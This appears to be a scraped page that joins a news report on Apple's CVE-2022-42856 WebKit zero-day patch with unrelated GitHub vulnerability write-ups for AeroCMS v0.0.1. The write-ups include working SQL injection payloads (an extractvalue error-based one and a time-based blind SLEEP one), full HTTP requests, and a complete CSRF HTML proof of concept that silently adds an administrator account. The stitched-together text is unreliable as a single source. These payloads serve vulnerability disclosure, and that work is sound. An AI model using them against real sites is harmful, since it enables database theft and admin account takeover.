Tracked as CVE-2022-42856, the issue has been described by the tech giant as a type confusion issue in the WebKit browser engine that could be triggered when processing specially crafted content, leading to

Apple on Tuesday rolled out security updates to iOS, iPadOS, macOS, tvOS, and Safari web browser to address a new zero-day vulnerability that could result in the execution of malicious code.

Tracked as **CVE-2022-42856**, the issue has been described by the tech giant as a type confusion issue in the WebKit browser engine that could be triggered when processing specially crafted content, leading to arbitrary code execution.

The company said it's "aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1."

While details surrounding the exact nature of the attacks are unknown as yet, it's likely that it involved a case of social engineering or a watering hole to infect the devices when visiting a rogue or legitimate-but-compromised domain via the browser.

It's worth noting that every third-party web browser that's available for iOS and iPadOS, including Google Chrome, Mozilla Firefox, and Microsoft Edge, and others, is required to use the WebKit rendering engine due to restrictions imposed by Apple.

Credited with discovering and reporting the issue is Clément Lecigne of Google's Threat Analysis Group (TAG). Apple noted it addressed the bug with improved state handling.

The update, which is available with iOS 15.7.2, iPadOS 15.7.2, macOS Ventura 13.1, tvOS 16.2, and Safari 16.2, arrives two weeks after Apple patched the same bug in iOS 16.1.2 on November 30, 2022.

The fix marks the resolution of the tenth zero-day vulnerability discovered in Apple software since the start of the year. It's also the ninth actively exploited zero-day flaw in 2022 -

*   **CVE-2022-22587** (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-22594** (WebKit Storage) – A website may be able to track sensitive user information (publicly known but not actively exploited)
*   **CVE-2022-22620** (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
*   **CVE-2022-22674** (Intel Graphics Driver) – An application may be able to read kernel memory
*   **CVE-2022-22675** (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-32893** (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
*   **CVE-2022-32894** (Kernel) – An application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-32917** (Kernel) – An application may be able to execute arbitrary code with kernel privileges
*   **CVE-2022-42827** (Kernel) – An application may be able to execute arbitrary code with kernel privileges

The latest iOS, iPadOS, and macOS updates also introduce a new security feature called Advanced Data Protection for iCloud that expands end-to-end encryption (E2EE) to ‌iCloud‌ Backup, Notes, Photos, and more.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Actively Exploited Zero-Day Vulnerability Discovered in Apple Products

The approve parameter from the AeroCMS-v0.0.1 CMS system is vulnerable to SQL injection attacks.

Permalink

Cannot retrieve contributors at this time

**view\_all\_comments\_update**

The approve parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Step to Reproduct**

Login to admin panel -> Comments -> Approve.

**Exploit**

Query out the current user

**Vulnerable Code**

    admin/includes/view_all_comments.php
    

The approve parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    UPDATE comments SET comment_status = 'approved' WHERE comment_id = 3 and extractvalue(0,concat(0x7e,user())) LIMIT 1
    

**POC**

*   Injection Point

    approve=3+and+extractvalue(0,concat(0x7e,user()))
    

*   Request

    GET /AeroCMS-0.0.1/admin/comments.php?approve=3+and+extractvalue(0,concat(0x7e,user())) HTTP/1.1
    Host: localhost
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/AeroCMS-0.0.1/admin/comments.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=jl83irkvqmkeaq7j0bmr3i63q5
    Connection: close

CVE-2022-46051: CVE/view_all_comments_update.MD at master · rdyx0/CVE

AeroCMS v0.0.1 is vulnerable to Cross Site Request Forgery (CSRF).

Permalink

Cannot retrieve contributors at this time

**add\_user\_csrf****Description**

AeroCMS v0.0.1 has a vulnerability, Cross-site request forgery(CSRF). This vulnerability may cause the modification of personal information such as administrator password. To exploit this vulnerability, a constructed HTML file needs to be opened.

**Exploit**

1、Login to admin panel -> Users -> Add User.

2.  Build a request package to add administrator information.

<html\>
  <!\-- CSRF PoC \- generated by Burp Suite Professional \--\>
  <body\>
  <script\>history.pushState('', '', '/')</script\>
    <script\>
      function submitRequest()
      {
        var xhr \= new XMLHttpRequest();
        xhr.open("POST", "http:\\/\\/localhost\\/AeroCMS-0.0.1\\/admin\\/users.php?source=add\_user", true);
        xhr.setRequestHeader("Content-Type", "multipart\\/form-data; boundary=----WebKitFormBoundarydLYE4lYNAM12hDqt");
        xhr.setRequestHeader("Accept", "text\\/html,application\\/xhtml+xml,application\\/xml;q=0.9,image\\/avif,image\\/webp,image\\/apng,\*\\/\*;q=0.8,application\\/signed-exchange;v=b3;q=0.9");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9");
        xhr.withCredentials \= true;
        var body \= "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"username\\"\\r\\n" + 
          "\\r\\n" + 
          "111111\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"password\\"\\r\\n" + 
          "\\r\\n" + 
          "111111\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"user\_firstname\\"\\r\\n" + 
          "\\r\\n" + 
          "\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"user\_lastname\\"\\r\\n" + 
          "\\r\\n" + 
          "\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"user\_email\\"\\r\\n" + 
          "\\r\\n" + 
          "\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"user\_image\\"; filename=\\"\\"\\r\\n" + 
          "Content-Type: application/octet-stream\\r\\n" + 
          "\\r\\n" + 
          "\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"user\_role\\"\\r\\n" + 
          "\\r\\n" + 
          "Admin\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"create\_user\\"\\r\\n" + 
          "\\r\\n" + 
          "Add User\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt--\\r\\n";
        var aBody \= new Uint8Array(body.length);
        for (var i \= 0; i < aBody.length; i++)
          aBody\[i\] \= body.charCodeAt(i); 
        xhr.send(new Blob(\[aBody\]));
      }
    </script\>
    <form action\="#"\>
      <input type\="button" value\="Submit request" onclick\="submitRequest();" /\>
    </form\>
  </body\>
</html\>

3.View that there are currently only two users

4.Click on the constructed web page.

5.The new administrator account was successfully added

CVE-2022-46059: CVE/add_user_csrf.md at master · rdyx0/CVE

AeroCMS v0.0.1 is vulnerable to SQL Injection via the delete parameter.

**categories\_delete\_sql\_injection**

The delete parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Step to Reproduct**

Login to admin panel -> Categories-> Delete.

**Exploit**

The first character of the current database is ord('a'), which is chr(97), delay

**Vulnerable Code**

    AeroCMS-0.0.1\admin\categories.php
    

Use the deleteCategories() function

Traced to the 'admin/functions.php' file

The delete parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

**SQL query statements**

    DELETE FROM categories WHERE cat_id = 3 RLIKE (SELECT 5646 FROM (SELECT(SLEEP((IF(ORD(MID((IFNULL(CAST(DATABASE() AS NCHAR),0x20)),1,1))=97,3,0)))))XOyv) LIMIT 1
    

**POC**

*   Injection Point

    delete=3+RLIKE+(SELECT+5646+FROM+(SELECT(SLEEP((IF(ORD(MID((IFNULL(CAST(DATABASE()+AS+NCHAR),0x20)),1,1))%3d97,3,0)))))XOyv)
    

*   Request

    GET /AeroCMS-0.0.1/admin/categories.php?delete=3+RLIKE+(SELECT+5646+FROM+(SELECT(SLEEP((IF(ORD(MID((IFNULL(CAST(DATABASE()+AS+NCHAR),0x20)),1,1))%3d97,3,0)))))XOyv) HTTP/1.1
    Host: localhost
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/AeroCMS-0.0.1/admin/categories.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=jl83irkvqmkeaq7j0bmr3i63q5
    Connection: close

Tag

#webkit